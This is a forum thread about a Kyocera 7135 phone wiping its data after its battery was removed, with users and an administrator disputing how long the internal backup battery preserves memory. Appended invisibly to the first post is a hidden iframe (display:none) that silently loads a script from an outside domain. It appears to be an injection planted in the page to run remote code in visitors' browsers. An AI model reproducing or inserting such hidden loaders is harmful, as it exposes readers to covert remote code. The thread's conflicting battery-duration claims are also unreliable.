+ Reply to Thread

Thread: Battery removal

Battery removal

I spent the majority of last night transferring all the info and apps from my Palm to my 7135. Everything went fine without a hitch. But when I contacted Verizon to setup activation this morning, I removed the battery out of the phone and read the necessary info to the rep. After putting the battery back in the phone and powering up the phone...guess what? All the crap I transferred was gone and the phone was going back through the setup options. What gives?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Everything’s easy for those who don't know how to do it.

That should not have happened unless you were holding in the backlight key when it was powering back up. (that is how to do a hard reset, v.s. a soft which is done by puting the stylus in the little hole next to the battery, or just changing batteries).

How long was the battery out, and did it have a ful charge before you removed it? I don't know how long the 7135 keeps it's memory when power is removed. Should be quite a while, but certainly won't be forever.....

Alan

Administrator
    obviously, the internal battery was not fully charged. its recommended you keep power to the phone for atleast the first 24 hours to charge the internal battery. this non removeable battery keeps the memory intact when the external battery is dead.

The phone was left to charge for more than 24hrs.... I used the phone's pda functions in the cradle for at least two days before I called to get service.

alanb

1. The battery was out of the phone for no longer than 5min max.
    2. The battery was indicating being fully charged before I took the battery out.

if you did a hot synch, can't you restore what you lost?

Me too

I've experienced the same thing, and all I did was swap a low battery for my spare, which was fully charged. The battery was out for maybe 5 seconds and it reverted to its initial state. I had hotsynced recently, so it wasn't a huge deal, but this can't be intended behavior.

- Hec

ebolean

Can't do a hotsync the Palm cradle is at my workplace. All the info on my pda was sync from my computer a work. Took a little vacation and wanted to have the transfer done before I went back. I still have time to beam everything again...

Administrator
    the internall batery seems to be the fault since it retains memory when no external battery is connected.. either its not being charged fully or the phone is defective. its also possible that any hacks you uhave on the phone could cause it to go wacky...

I let the phone charge another 24hrs. and I will remove the battery tonight and see if it retains any of the info I beamed over as a test. Let you know in about an hour (EST).

Well CTalley? Save me the agony of another long restore ... did the battery removal go OK this time?

- Hec

Why is everyone questioning this as abnormal behavior? This is normal behavior for any palm device. You take out the battery for more than a minute and you lose all your data. Am I missing something here?

Administrator
    the 7135 has a internal battery that will retain memory for about a day on a full charge. we believe his internal battery may not have been fully charged, which is why his data was erased. that is not normal behavior for the 6035 or 7135....

Our service Tech's said that the 7135 will only hold it's memory for 90 seconds if the battery has been removed. This after a repair training with Kyocera.....so I imagine this is normal behavior as wcarlson40 suggested.

JL

edit: the internal battery is for when li/ion battery life is exausted and their may be a loss of data untill the equipment can be charged again....it will temporarily hold any info you may have uploaded or manually entered.

If I am wrong, and I very well may be, I welcome any corrections.

I believe you are right -- The internal (non-removable) battery is what keeps the memory from erasing when the removable batery is removed-- this is a very small battery and thus the 90 second lifespan, however if the removable battery is exasted enough that the palm cannot turn on, howevre it still has enough power to hold the memory intact for much longer (days) than the internal battery can due to its increased amperage. This is true for all palms I have seen with removable batteries...Just becasue its too low to power the palm doesnt mean it can't sustain the info until its charged or swapped out.
    iPhone therefore iAm.

Administrator
    i disagree.

the internal battery will last longer than 90 seconds...

this was confirmed by ME when i did it with the 6035, i300, and i330. i also believe its in the manual.

Uh, we're talking about the 7135, not the 6035 or any Windows device. A completely different device.

Any 7135 owners out there willing to take out their battery for 5 minutes and see what happens?

Administrator
    doesnt make a difference which model. its a kyo...

it would make no sense for the kyo geeks to limit the internal battery for only a minute and a half when the discontinued model lasts for much much longer...

I have seen some palms last like 5-10 minutes but most I've played with only last about 2 -- It might vary based on age, brand, or amount of charge left in device before removing batteries.

I have a feeling If its been used past the point when it tells you TWICE to stop and check your batteries then your treading on thin ground. If the unit was just sitting on a charger overnight and then the batt removed, the remaining internal batt is full and probably give better results.

Im no batt expert-- these are things I have just observed with normal use.
    iPhone therefore iAm.